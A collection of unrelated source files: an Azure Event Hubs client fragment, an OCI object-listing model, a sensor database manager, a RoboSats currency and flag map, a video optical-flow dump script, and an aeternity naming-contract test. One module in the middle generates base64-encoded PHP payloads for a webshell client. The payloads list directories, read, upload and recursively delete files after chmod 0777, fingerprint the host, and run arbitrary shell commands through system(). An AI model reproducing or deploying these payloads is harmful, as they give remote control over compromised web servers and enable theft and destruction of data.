                error = ValueError("This consumer is already receiving events from partition {} for consumer group {}. "
                                   .format(partition_id, consumer_group))
            if error:
                log.warning(error)
                raise error
            event_processor = EventProcessor(
                self, consumer_group, on_events,
                partition_manager=self._partition_manager,
                polling_interval=self._load_balancing_interval,
                **kwargs
            )
            # Register under "-1" when receiving from all partitions.
            self._event_processors[(consumer_group, partition_id or "-1")] = event_processor
            event_processor.start()
    def close(self):
        # type: () -> None
        """Stop retrieving events from event hubs and close the underlying AMQP connection and links.
        :rtype: None
        .. admonition:: Example:
            .. literalinclude:: ../samples/sync_samples/sample_code_eventhub.py
                :start-after: [START eventhub_consumer_client_close_sync]
                :end-before: [END eventhub_consumer_client_close_sync]
                :language: python
                :dedent: 4
                :caption: Close down the client.
        """
        with self._lock:
            # Stop every registered processor before closing the connection.
            for _ in range(len(self._event_processors)):
                _, ep = self._event_processors.popitem()
                ep.stop()
            super(EventHubConsumerClient, self).close()
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ListObjects(object):
    """
    The result of listing objects in a bucket: the object summaries, any
    common prefixes, and a marker for fetching the next page.

    To use any of the API operations, you must be authorized in an IAM policy. If you are not authorized,
    talk to an administrator. If you are an administrator who needs to write policies to give users access, see
    `Getting Started with Policies`__.

    __ https://docs.cloud.oracle.com/Content/Identity/Concepts/policygetstarted.htm
    """

    def __init__(self, **kwargs):
        """
        Initializes a new ListObjects object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param objects: the object summaries returned by the request.
        :type objects: list[oci.object_storage.models.ObjectSummary]

        :param prefixes: common prefixes when the request used a delimiter.
        :type prefixes: list[str]

        :param next_start_with: marker for requesting the next page.
        :type next_start_with: str
        """
        self.swagger_types = {
            'objects': 'list[ObjectSummary]',
            'prefixes': 'list[str]',
            'next_start_with': 'str'
        }
        self.attribute_map = {
            'objects': 'objects',
            'prefixes': 'prefixes',
            'next_start_with': 'nextStartWith'
        }
        self._objects = None
        self._prefixes = None
        self._next_start_with = None

    @property
    def objects(self):
        """
        **[Required]** Gets the objects of this ListObjects: an array of
        object summaries.

        :rtype: list[oci.object_storage.models.ObjectSummary]
        """
        return self._objects

    @objects.setter
    def objects(self, objects):
        """
        Sets the objects of this ListObjects.

        :type: list[oci.object_storage.models.ObjectSummary]
        """
        self._objects = objects

    @property
    def prefixes(self):
        """
        Gets the prefixes of this ListObjects: prefixes that are common to
        the results returned by the request if the request specified a delimiter.

        :rtype: list[str]
        """
        return self._prefixes

    @prefixes.setter
    def prefixes(self, prefixes):
        """
        Sets the prefixes of this ListObjects.

        :type: list[str]
        """
        self._prefixes = prefixes

    @property
    def next_start_with(self):
        """
        Gets the next_start_with of this ListObjects: the name of the object
        to use in the `start` parameter to obtain the next page of a
        truncated ListObjects response. Avoid entering confidential information.
        Example: test/object1.log

        :rtype: str
        """
        return self._next_start_with

    @next_start_with.setter
    def next_start_with(self, next_start_with):
        """
        Sets the next_start_with of this ListObjects.

        :type: str
        """
        self._next_start_with = next_start_with

    def __repr__(self):
        return formatted_flat_dict(self)

    def __eq__(self, other):
        # None compares unequal; otherwise compare full attribute state.
        return other is not None and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self == other
|
<gh_stars>1-10
import base64
def getFilePathBase():
"""
获取请求url文件的文件路径
:return: php->base64 code
"""
code = """
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
header("Content-Type:application/json");
$res = array();$res["path"] = dirname(__FILE__);
echo ("<ek>");
echo json_encode($res);
echo ("</ek>");
die();
"""
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def getFilelistBase(path):
"""
获取该路径下所有文件信息
:param path: 文件路径
:return: PHP->base64 code
"""
code = """
header("Content-Type:application/json");
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
function getfile($path){
$i=0;
$res = array();
if($handler = opendir($path)){
while (($file = readdir($handler)) !==false){
$f = array();
$f["name"] = $file;
$f['type'] = filetype($path ."/". $file);
$f['time'] = date("Y-m-d H:i:s", filemtime($path ."/". $file));
$f['size'] = filesize($path ."/". $file);
$res[$i] = $f;
$i++;
}
closedir($handler);
}
echo ("<ek>");
echo json_encode($res);
echo ("</ek>");
}
getfile("%s");die();
"""% path
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def getFile(path):
"""
指定一个文件的路径,放回该文件的信息。
:param path: 文件路径
:return: PHP-> base64 code
"""
code = """
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
$path = '%s';
$hanlder = fopen($path, 'rb');
$res = fread($hanlder, filesize($path));
fclose($hanlder);
echo $res;
"""% path
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def deleteFile(path):
"""
删除文件
:param path:
:return:
"""
code = """
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
function df($p){
$m=@dir($p);
while(@$f=$m->read()){
$pf=$p."/".$f;
if((is_dir($pf))&&($f!=".")&&($f!="..")){
@chmod($pf,0777);
df($pf);
}
if(is_file($pf)){
@chmod($pf,0777);
@unlink($pf);
}
}
$m->close();
@chmod($p,0777);
return @rmdir($p);
}
function delf($path){
echo("<ek>");
if(is_dir($path)){
echo(df($path));
}
else{
echo(file_exists($path)?@unlink($path)?"1":"0":"0");
};
echo("</ek>");
die();
}
delf("%s");""" % path
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def changeName(path, newnamepath):
code="""
@ini_set("display_errors","0");
@set_time_limit(0);
echo("<ek>");;
echo(rename("%s","%s")?"1":"0");;
echo("</ek>");
die();""" % (path, newnamepath)
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def uploadFile(path, content):
code="""
@ini_set("display_errors","0");
@set_time_limit(0);
echo("<ek>");
function f($f,$c){
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2){
$buf.=urldecode("%".substr($c,$i,2));
}
echo(fwrite(fopen($f,"w"),$buf)?"1":"0");;
echo("</ek>");
die();
}
"""+"""f('%s','%s');""" % (path, content)
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def createFile(path, content):
code="""
@ini_set("display_errors","0");
@set_time_limit(0);
function f($path, $content){
echo("<ek>");;
echo @fwrite(@fopen($path,"w"),$content)?"1":"0";;
echo("</ek>");
die();
}
f('%s', '%s');""" % (path, content)
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def createDir(path):
code="""
@ini_set("display_errors","0");
@set_time_limit(0);
function c($path){
echo("<ek>");;
echo(mkdir($path)?"1":"0");;
echo("</ek>");
die();
}
c('%s');
"""%path
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def execShellCreate():
code="""
@ini_set("display_errors","0");
@set_time_limit(0);
echo("<ek>");;
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")
$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}\t";
if(substr($D,0,1)!="/"){
foreach(range("A","Z") as $L)
if(is_dir("{$L}:"))$R.="{$L}:";
}
$R.="\t";
$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';
$usr=($u)?$u['name']:@get_current_user();
$R.=php_uname();
$R.="({$usr})";
print $R;;
echo("</ek>");
die();"""
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
def execShell(cmd, options):
code = """
@ini_set("display_errors","0");
@set_time_limit(0);
echo("->|");;
$p=base64_decode('%s');
$s=base64_decode('%s');
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";
@system($r." 2>&1",$ret);
print ($ret!=0)?"ret={$ret}":"";;
echo("|<-");die();
"""% (cmd, options)
return base64.b64encode(code.encode("UTF-8")).decode("UTF-8")
if __name__ == '__main__':
# print(deleteFile("C:/Users/elloit/Desktop/php/PHPTutorial/WWW/pass.txt"))
print(uploadFile('/vae/asd/asd', 'asdasd'))
|
'''
DataBear database manager class
- init: Connect to database (databear.db) or create if none
- load_sensor: Loads measurements to database from sensor_class
- Various get/set methods
'''
import os
import sys
import sqlite3
import importlib
#-------- Database Initialization and Setup ------
class DataBearDB:
'''
The sqlite database for databear
'''
    def __init__(self):
        '''
        Initialize the database manager
        - Connect to the sqlite database at the path in env var DBDATABASE
        -- If DBDATABASE is not set, use databear.db in the CWD
        -- Create and initialize the database file if it does not exist
        - Create connection to database
        '''
        try:
            self.dbpath = os.environ['DBDATABASE']
        except KeyError:
            #DBDATABASE not set, assume databear.db in CWD
            self.dbpath = 'databear.db'
        # Add SENSORSPATH to pythonpath for importing alternative sensors
        if 'DBSENSORPATH' in os.environ:
            sys.path.append(os.environ['DBSENSORPATH'])
        #Set an attribute for config_id related functions
        # Maps config type -> [id column name, table name] for getConfigIDs()
        self.configtables = {
            'sensor':['sensor_config_id','sensor_configuration'],
            'logging':['logging_config_id','logging_configuration']
        }
        # Check if database exists
        exists = os.path.isfile(self.dbpath)
        # Initialize database sqlite connection object
        # This will create the file if it doesn't exist, hence the check first
        # check_same_thread=False: connection is shared across threads;
        # NOTE(review): callers must serialize access themselves.
        self.conn = sqlite3.connect(self.dbpath, check_same_thread=False)
        self.conn.row_factory = sqlite3.Row
        self.curs = self.conn.cursor()
        self.path = os.path.dirname(__file__)
        # Only initialize if the database didn't already exist
        if not exists:
            with open(self.path + '/databearDB.sql', 'r') as sql_init_file:
                sql_script = sql_init_file.read()
                self.curs.executescript(sql_script)
@property
def sensors_available(self):
'''
A list of sensors from the sensors table
'''
sensorlist = []
self.curs.execute('SELECT * FROM sensors_available')
for row in self.curs.fetchall():
sensorlist.append(row['sensor_module'])
return sensorlist
@property
def active_sensor_ids(self):
'''
Return a dictionary mapping sensor name to id for active sensors
'''
sensorids = {}
self.curs.execute('SELECT sensors.sensor_id AS sensor_id, name '
'FROM sensors JOIN '
'sensor_configuration ON '
'sensors.sensor_id = sensor_configuration.sensor_id '
'WHERE status=1')
for row in self.curs.fetchall():
sensorids[row['name']] = row['sensor_id']
return sensorids
@property
def sensor_modules(self):
'''
Return a dictionary mapping sensor names to classes
'''
sensormodules = {}
self.curs.execute('SELECT name, module_name FROM sensors')
for row in self.curs.fetchall():
sensormodules[row['name']] = row['module_name']
return sensormodules
@property
def process_ids(self):
'''
A dictionary mapping process names to ids
'''
processids = {}
self.curs.execute('SELECT process_id, name FROM processes')
for row in self.curs.fetchall():
processids[row['name']] = row['process_id']
return processids
    def load_sensor(self,module_name):
        '''
        Loads sensor module to the sensors_available table if not already there.
        Also load sensor measurements into database if not already there.

        The module is imported by name (DBSENSORPATH was appended to sys.path
        in __init__) and must expose a class named ``dbsensor`` with
        ``measurements``, ``units`` and ``measurement_description`` attributes.
        '''
        #Check if sensor is already in sensors_available
        if module_name in self.sensors_available:
            return
        # Import sensor to load measurements to measurements table
        # DBSENSORPATH added to sys.path during init
        sensor_module = importlib.import_module(module_name)
        # Load class. Class name should be dbsensor
        sensor_class = getattr(sensor_module,'dbsensor')
        #Load sensor measurements to database
        for measurement_name in sensor_class.measurements:
            self.addMeasurement(
                module_name,
                measurement_name,
                sensor_class.units[measurement_name],
                sensor_class.measurement_description.get(measurement_name,None)
            )
        #Update sensors_available table
        #Do this last to ensure there is no failure loading measurements
        #prior to making the sensor available
        self.curs.execute('INSERT INTO sensors_available '
                          '(sensor_module) VALUES (?)',(module_name,))
        self.conn.commit()
def addMeasurement(self,sensormodule,measurename,units,description=None):
'''
Add a measurement to the database
Returns new rowid
'''
addqry = ('INSERT INTO measurements '
'(name,units,description,sensor_module) '
'VALUES (?,?,?,?)')
qryparams = (measurename,units,description,sensormodule)
self.curs.execute(addqry,qryparams)
self.conn.commit()
return self.curs.lastrowid
def addSensor(self,modulename,sensorname,serialnumber,address,virtualport,description=None):
'''
Add a new sensor to the database
'''
addqry = ('INSERT INTO sensors '
'(name,serial_number,address,virtualport,module_name,description) '
'VALUES (?,?,?,?,?,?)')
qryparams = (sensorname,serialnumber,address,virtualport,modulename,description)
self.curs.execute(addqry,qryparams)
self.conn.commit()
return self.curs.lastrowid
def addSensorConfig(self, sensor_id, measure_interval):
'''
Add a new sensor configuration to the system
'''
self.curs.execute('INSERT INTO sensor_configuration '
'(sensor_id,measure_interval,status) '
'VALUES (?,?,?)',(sensor_id,measure_interval,1))
self.conn.commit()
return self.curs.lastrowid
def addLoggingConfig(self, measurement_id, sensor_id, storage_interval, process_id, status):
'''
Add a new logger configuration
'''
params = (measurement_id, sensor_id, storage_interval, process_id, status)
self.curs.execute('INSERT INTO logging_configuration '
'(measurement_id, sensor_id, storage_interval, process_id, status) '
'VALUES (?,?,?,?,?)',params)
self.conn.commit()
return self.curs.lastrowid
def getSensorIDs(self,activeonly=False):
'''
Return list of sensor ids.
activeonly: true/false, to return only active sensorids
'''
sensor_ids = []
if activeonly:
qry = ('SELECT sensor_id FROM sensor_configuration '
'WHERE status=1')
else:
qry = 'SELECT sensor_id FROM sensors'
self.curs.execute(qry)
for row in self.curs.fetchall():
sensor_ids.append(row["sensor_id"])
return sensor_ids
def getConfigIDs(self,configtype,activeonly=False):
'''
Return list of configuration IDs from either sensor config or logging config.
configtype = 'sensor' or 'logging'
activeonly = True/False, when true only active configs returned
'''
ids = []
qry = 'SELECT {} from {}'.format(
self.configtables[configtype][0],
self.configtables[configtype][1])
if activeonly:
qry = qry + ' WHERE status=1'
for row in self.curs.execute(qry):
ids.append(row[self.configtables[configtype][0]])
return ids
def getMeasurementID(self,measurement_name,module_name):
'''
Get the measurement id for a given name and sensor class
'''
params = (measurement_name,module_name)
self.curs.execute('SELECT measurement_id FROM measurements '
'WHERE name=? and sensor_module=?',params)
row = self.curs.fetchone()
if not row:
return None
return row['measurement_id']
def getSensorID(self,sensorname,serialnumber,address,virtualport,modulename):
'''
Get sensor id associated with parameters
Return sensor_id or none
'''
params = (sensorname,serialnumber,address,virtualport,modulename)
self.curs.execute('SELECT sensor_id FROM sensors '
'WHERE name=? AND serial_number=? '
'AND address=? AND virtualport=? '
'AND module_name=?',params)
row = self.curs.fetchone()
if not row:
return None
return row['sensor_id']
def getSensorConfigID(self,sensor_id,measure_interval):
'''
Get sensor configuration id associated with parameters
Return sensor_config_id or none
'''
params = (sensor_id,measure_interval)
self.curs.execute('SELECT sensor_config_id FROM sensor_configuration '
'WHERE sensor_id=? AND measure_interval=?',params)
row = self.curs.fetchone()
if not row:
return None
return row['sensor_config_id']
def getLoggingConfigID(self,measurement_id,sensor_id,storage_interval,process_id):
'''
Get logging configuration id associated with parameters
Return sensor_config_id or none
'''
params = (measurement_id,sensor_id,storage_interval,process_id)
self.curs.execute('SELECT logging_config_id FROM logging_configuration '
'WHERE measurement_id=? AND sensor_id=? '
'AND storage_interval=? AND process_id=?',params)
row = self.curs.fetchone()
if not row:
return None
return row['logging_config_id']
def getSensorConfig(self, sensor_id):
'''
Return the given sensor's object as a sensor object (name, serial_number, etc.)
or None if id is invalid
'''
sensor = {}
sensor_id = (sensor_id,)
self.curs.execute("Select * from sensors s inner join "
"sensor_configuration sc on s.sensor_id = sc.sensor_id "
"where s.sensor_id = ? and sc.status = 1", sensor_id)
row = self.curs.fetchone()
if not row:
return None
sensor["name"] = row["name"]
sensor["serial_number"] = row["serial_number"]
sensor["address"] = row["address"]
sensor["virtualport"] = row["virtualport"]
sensor["measure_interval"] = row["measure_interval"]
sensor["module_name"] = row["module_name"]
sensor["sensor_config_id"] = row["sensor_config_id"]
return sensor
def getLoggingConfig(self, logging_config_id):
# Get a logging configuration by it's id
# Logging configurations join with measurements, processes, and sensors to get all their details
config = {}
self.curs.execute(
'SELECT m.name AS measurement_name, s.name AS sensor_name, '
'p.name AS process_name, storage_interval FROM logging_configuration l '
'INNER JOIN measurements m ON l.measurement_id = m.measurement_id '
'INNER JOIN processes p ON l.process_id = p.process_id '
'INNER JOIN sensors s on l.sensor_id = s.sensor_id '
'WHERE l.logging_config_id = ?', (logging_config_id,))
row = self.curs.fetchone()
if not row:
return None
config["measurement_name"] = row["measurement_name"]
config["sensor_name"] = row["sensor_name"]
config["storage_interval"] = row["storage_interval"]
config["process"] = row["process_name"]
return config
def setConfigStatus(self,configtype,config_id,status='activate'):
'''
Set a configuration to active or not active
configtype = 'sensor' or 'logging'
config_id
toggle = 'activate' or 'deactivate'
'''
togglecode = {'activate':1,'deactivate':None}
qry = 'UPDATE {} SET status=? WHERE {}=?'.format(
self.configtables[configtype][1],
self.configtables[configtype][0]
)
self.curs.execute(qry,(togglecode[status],config_id))
self.conn.commit()
def storeData(self, datetime, value, sensor_config_id, logging_config_id, qc_flag):
'''
Store data value in database
Inputs:
- datetime [string]
Returns new rowid
'''
storeqry = ('INSERT INTO data '
'(dtstamp,value,sensor_configid,logging_configid,qc_flag) '
'VALUES (?,?,?,?,?)')
qryparams = (datetime, float(value), sensor_config_id, logging_config_id, qc_flag)
self.curs.execute(storeqry,qryparams)
self.conn.commit()
return self.curs.lastrowid
def close(self):
'''
Close all connections
'''
self.curs.close()
self.conn.close()
|
<reponame>zx9r/RobosatsTwitterOrderbook
# From https://github.com/Reckless-Satoshi/robosats/blob/main/frontend/static/assets/currencies.json
# Maps robosats numeric currency ids (kept as strings, matching the JSON
# source) to currency codes.
# NOTE(review): ids "12" and "16" both map to KRW -- verify against the
# upstream currencies.json whether "16" should be a different currency.
CURRENCIES = {
    "1": "USD",
    "2": "EUR",
    "3": "JPY",
    "4": "GBP",
    "5": "AUD",
    "6": "CAD",
    "7": "CHF",
    "8": "CNY",
    "9": "HKD",
    "10": "NZD",
    "11": "SEK",
    "12": "KRW",
    "13": "SGD",
    "14": "NOK",
    "15": "MXN",
    "16": "KRW",
    "17": "RUB",
    "18": "ZAR",
    "19": "TRY",
    "20": "BRL",
    "21": "CLP",
    "22": "CZK",
    "23": "DKK",
    "24": "HRK",
    "25": "HUF",
    "26": "INR",
    "27": "ISK",
    "28": "PLN",
    "29": "RON",
    "30": "ARS",
    "31": "VES",
    "32": "COP",
    "33": "PEN",
    "34": "UYU",
    "35": "PYG",
    "36": "BOB",
    "37": "IDR",
    "38": "ANG",
    "39": "CRC",
    "40": "CUP",
    "41": "DOP",
    "42": "GHS",
    "43": "GTQ",
    "44": "ILS",
    "45": "JMD",
    "46": "KES",
    "47": "KZT",
    "48": "MYR",
    "49": "NAD",
    "50": "NGN",
    "51": "AZN",
    "52": "PAB",
    "53": "PHP",
    "54": "PKR",
    "55": "QAR",
    "56": "SAR",
    "57": "THB",
    "58": "TTD",
    "59": "VND",
    "60": "XOF",
    "61": "TWD",
    "300": "XAU",
    "1000": "BTC"
}
# From https://github.com/Reckless-Satoshi/robosats/blob/a4a76d1d9f3af090fc3ef8250b9e9df8b7d9874f/frontend/src/components/getFlags.js
def get_flag(code):
    """
    Return the emoji flag for a currency code.

    :param code: currency code string, e.g. 'USD'
    :return: the matching flag emoji, or a white flag for unknown codes
    """
    flags = {
        'AUD': '🇦🇺',
        'ARS': '🇦🇷',
        'BRL': '🇧🇷',
        'CAD': '🇨🇦',
        'CHF': '🇨🇭',
        'CLP': '🇨🇱',
        'CNY': '🇨🇳',
        'EUR': '🇪🇺',
        'HRK': '🇨🇷',
        'CZK': '🇨🇿',
        'DKK': '🇩🇰',
        'GBP': '🇬🇧',
        'HKD': '🇭🇰',
        'HUF': '🇭🇺',
        'INR': '🇮🇳',
        'ISK': '🇮🇸',
        'JPY': '🇯🇵',
        'KRW': '🇰🇷',
        'MXN': '🇲🇽',
        'NOK': '🇳🇴',
        'NZD': '🇳🇿',
        'PLN': '🇵🇱',
        'RON': '🇷🇴',
        'RUB': '🇷🇺',
        'SEK': '🇸🇪',
        'SGD': '🇸🇬',
        'VES': '🇻🇪',
        'TRY': '🇹🇷',
        'USD': '🇺🇸',
        'ZAR': '🇿🇦',
        'COP': '🇨🇴',
        'PEN': '🇵🇪',
        'UYU': '🇺🇾',
        'PYG': '🇵🇾',
        'BOB': '🇧🇴',
        'IDR': '🇮🇩',
        'ANG': '🇧🇶',
        'CRC': '🇨🇷',
        'CUP': '🇨🇺',
        'DOP': '🇩🇴',
        'GHS': '🇬🇭',
        'GTQ': '🇬🇹',
        'ILS': '🇮🇱',
        'JMD': '🇯🇲',
        'KES': '🇰🇪',
        'KZT': '🇰🇿',
        # NOTE(review): this is the Myanmar flag, but MYR is the Malaysian
        # ringgit -- confirm against the upstream getFlags.js before changing.
        'MYR': '🇲🇲',
        'NAD': '🇳🇦',
        'NGN': '🇳🇬',
        'AZN': '🇦🇿',
        'PAB': '🇵🇦',
        'PHP': '🇵🇭',
        'PKR': '🇵🇰',
        'QAR': '🇶🇦',
        'SAR': '🇸🇦',
        'THB': '🇹🇭',
        'TTD': '🇹🇹',
        'VND': '🇻🇳',
        'XOF': '🇸🇳',
        'XAU': '🟨',
    }
    # dict.get replaces the original try/except KeyError fallback
    return flags.get(code, '🏳')
|
import argparse
import os
import numpy as np
import cv2
import time
import pandas as pd
from tqdm import tqdm
from joblib import Parallel, delayed
def parse_args():
    """
    Parse the command line arguments for the flow dumping script.

    Returns
    ----------
    args: argparse.Namespace
        Parsed options (annotation_file, root_dir, out_dir, file_format,
        win_len, njobs)
    """
    parser = argparse.ArgumentParser(
        description="dump epic kitchens flow images into pickle files"
    )
    # Required positional arguments.
    positional = [
        ("annotation_file",
         "<path_to_epic_kitchens>/annotations/<annotation_file>.csv"),
        ("root_dir",
         "<path_to_epic_kitchens>/EPIC_KITCHENS_2018/frames_rgb_flow/flow/<train or test>"),
    ]
    for arg_name, help_text in positional:
        parser.add_argument(arg_name, help=help_text, type=str)
    # Optional arguments with sensible defaults.
    parser.add_argument("--out-dir", dest="out_dir",
                        help="path to save output files",
                        default="./epic/flow", type=str)
    parser.add_argument("--file-format", dest="file_format",
                        help="naming format of image files",
                        default="frame_{:010d}.jpg", type=str)
    parser.add_argument("--win-len", dest="win_len",
                        help="number of flow frames to read",
                        default=5, type=int)
    parser.add_argument("--njobs", dest="njobs",
                        help="no of cpu cores to use", default=4, type=int)
    return parser.parse_args()
def get_time_diff(start_time, end_time):
    """
    Helper function to calculate time difference

    Args
    ----------
    start_time: float
        Start time in seconds since January 1, 1970, 00:00:00 (UTC)
    end_time: float
        End time in seconds since January 1, 1970, 00:00:00 (UTC)

    Returns
    ----------
    hours: int
        Difference of hours between start and end time
    minutes: int
        Difference of minutes between start and end time
    seconds: int
        Difference of seconds between start and end time
    """
    # Round the total difference once, then split it with divmod so the
    # three components can never be inconsistent.  The previous version
    # truncated hours/minutes with int() but rounded the seconds, so a
    # 59.7 s difference was reported as (0, 0, 60).
    total_seconds = int(round(end_time - start_time))
    minutes, seconds = divmod(total_seconds, 60)
    hours, minutes = divmod(minutes, 60)
    return (hours, minutes, seconds)
def read_image(path, img_file):
    """
    Read the horizontal (u) and vertical (v) optical flow images and stack
    them along the channel axis.

    Args
    ----------
    path: str
        Directory containing the "u" and "v" flow sub-directories
    img_file: str
        Name of image file

    Returns
    ----------
    img: np.ndarray
        Array of shape (H, W, 2) holding the u and v flow components
    """
    u_file = os.path.join(path, "u", img_file)
    v_file = os.path.join(path, "v", img_file)
    assert os.path.exists(u_file), "{} file does not exist".format(u_file)
    u_img = cv2.imread(u_file, 0)
    # Bug fix: the original second check tested the "u" path again while its
    # error message referred to the "v" file; check the "v" path itself.
    assert os.path.exists(v_file), "{} file does not exist".format(v_file)
    v_img = cv2.imread(v_file, 0)
    img = np.concatenate((u_img[..., None], v_img[..., None]), axis=2)
    return img
def integrity_check(file):
    """
    Helper function to check integrity of a compressed numpy file

    Args
    ----------
    file: str
        Absolute location of compressed numpy file

    Returns
    ----------
    check_flag: bool
        True when the file opens and contains a "flow" array, False otherwise
    """
    try:
        # The with-block closes the archive on exit; the original's explicit
        # data.close() inside the block was redundant.
        with np.load(file) as data:
            _ = data["flow"]
        return True
    except Exception:
        # Narrowed from a bare except: a bare except would also swallow
        # KeyboardInterrupt/SystemExit during long batch runs.
        print("{} is corrupted. Overwriting file.".format(file))
        return False
def save_images_to_pickle(
    annotations,
    root_dir,
    out_dir,
    win_len,
    file_format="frame_{:010d}.jpg",
    attempts=10,
):
    """
    Iterate over every trimmed action segment of one participant and save
    the stacked optical flow frames of each window to a compressed numpy
    file (key "flow").

    Args
    ----------
    annotations: pd.DataFrame
        Rows with trimmed action segments of untrimmed videos
    root_dir: str
        Root directory of dataset
    out_dir: str
        Directory to store output files
    win_len: int
        No of optical flow frames to stack
    file_format: str, default="frame_{:010d}.jpg"
        File naming format
    attempts: int, default=10
        No of attempts to write files
    """
    for _, record in annotations.iterrows():
        vid_id = record["video_id"]
        vid_path = os.path.join(root_dir, record["participant_id"], vid_id)
        o_dir = os.path.join(out_dir, "flow_pickle", vid_id)
        os.makedirs(o_dir, exist_ok=True)
        # Frame indices are halved -- presumably flow was extracted at half
        # the RGB frame rate; TODO confirm against the dataset layout.
        start_frame = max(record["start_frame"] // 2, 1)
        end_frame = max(record["stop_frame"] // 2, 2)
        # full_read == True forces re-reading the whole window; False means
        # the previous iteration's stack can be shifted by one frame.
        full_read = True
        for idx in range(start_frame, end_frame + 1 - win_len):
            out_file = os.path.join(
                o_dir, os.path.splitext(file_format.format(idx - 1))[0] + ".npz"
            )
            # If file exists and is ok, skip
            if os.path.exists(out_file) and integrity_check(out_file):
                # The in-memory stack was not updated, so the next index
                # must be read from scratch.
                full_read = True
                continue
            else:
                for a in range(attempts):
                    # Create the whole flow stack for non-sequential frame indices
                    if full_read:
                        img = []
                        for i in range(win_len):
                            img.append(
                                read_image(vid_path, file_format.format(idx + i))
                            )
                    # Only append the data from new flow files in case of sequential frame indices
                    else:
                        # Drop the oldest frame (first two channels) and keep
                        # the rest of the previous stack.
                        # NOTE(review): on a retry (a > 0) img already holds
                        # this iteration's concatenated stack, so slicing
                        # [:, :, 2:] again drops one more frame and appends a
                        # duplicate of the newest one -- verify the retry path.
                        img = [img[:, :, 2:]]
                        img.append(
                            read_image(vid_path, file_format.format(idx + win_len - 1))
                        )
                    img = np.concatenate(img, axis=2)
                    np.savez_compressed(out_file, flow=img)
                    if integrity_check(out_file):
                        full_read = False
                        break
                    elif a == attempts - 1:
                        print(
                            "Unable to save {} properly. File might be corrupted".format(
                                out_file
                            )
                        )
    print("Completed saving flow frames for {}".format(record["participant_id"]))
def main(args):
    """
    Read the annotation csv and convert the flow frames of every
    participant to compressed numpy files, one worker per participant.

    Args
    ----------
    args: argparse.Namespace
        Parsed command line options from parse_args()
    """
    annotations = pd.read_csv(args.annotation_file)
    participant_list = annotations["participant_id"].unique().tolist()
    start = time.time()
    # NOTE(review): "annoations" typo in this user-facing message -- left
    # unchanged here since it is runtime output, not a comment.
    print(
        "Processing {} video annoations for {} participants with {} concurrent workers".format(
            annotations.shape[0], len(participant_list), args.njobs
        )
    )
    print("----------------------------------------------------------")
    # Parallel processing of each participant
    # Videos for each participant will be processed sequentially to prevent multiple writes to same file
    results = Parallel(n_jobs=args.njobs, verbose=10)(
        delayed(save_images_to_pickle)(
            annotations.query("participant_id == @p"),
            args.root_dir,
            args.out_dir,
            args.win_len,
            file_format=args.file_format,
        )
        for p in participant_list
    )
    print("Done")
    print("----------------------------------------------------------")
    print("Time taken[HH:MM:SS]: {}".format(get_time_diff(start, time.time())))
if __name__ == "__main__":
    # Script entry point: parse the CLI options, then run the conversion.
    args = parse_args()
    main(args)
|
from aeternity.contract_native import ContractNative
from aeternity import hashing, utils
from tests.conftest import random_domain
import pytest
contractAens = """contract DelegateTest =
// Transactions
stateful payable entrypoint signedPreclaim(addr : address,
chash : hash,
sign : signature) : unit =
AENS.preclaim(addr, chash, signature = sign)
stateful entrypoint signedClaim(addr : address,
name : string,
salt : int,
name_fee : int,
sign : signature) : unit =
AENS.claim(addr, name, salt, name_fee, signature = sign)
stateful entrypoint signedTransfer(owner : address,
new_owner : address,
name : string,
sign : signature) : unit =
AENS.transfer(owner, new_owner, name, signature = sign)
stateful entrypoint signedRevoke(owner : address,
name : string,
sign : signature) : unit =
AENS.revoke(owner, name, signature = sign)
"""
@pytest.mark.skip("blocked by https://github.com/aeternity/aepp-sdk-python/issues/306")
def test_node_contract_signature_delegation(compiler_fixture, chain_fixture):
    """
    Exercise AENS signature delegation through the DelegateTest contract:
    ALICE delegates preclaim/claim/transfer to the contract, then BOB
    (the new owner after the transfer) delegates the revoke.
    """
    compiler = compiler_fixture.COMPILER
    account = chain_fixture.ALICE
    bob = chain_fixture.BOB
    contract_native = ContractNative(client=chain_fixture.NODE_CLI, source=contractAens, compiler=compiler, account=account)
    contract_native.deploy()
    assert(contract_native.address is not None)
    # the contract_id
    contract_id = contract_native.address
    # node client
    ae_cli = contract_native.client
    # example name
    name = random_domain(length=15)
    c_id, salt = hashing.commitment_id(name, 9876)
    # NOTE(review): name_ttl and client_ttl are assigned but never used in
    # this test -- verify whether they were meant to be passed to the claim.
    name_ttl = 500000
    client_ttl = 36000
    name_fee = utils.amount_to_aettos("20AE")
    print(f"name is {name}, commitment_id: {c_id}")
    # aens calls
    signature = ae_cli.delegate_name_preclaim_signature(account, contract_id)
    call, r = contract_native.signedPreclaim(account.get_address(), c_id, signature)
    assert(call.return_type == 'ok')
    # the preclaim must be confirmed before the claim can be submitted
    ae_cli.wait_for_confirmation(call.tx_hash)
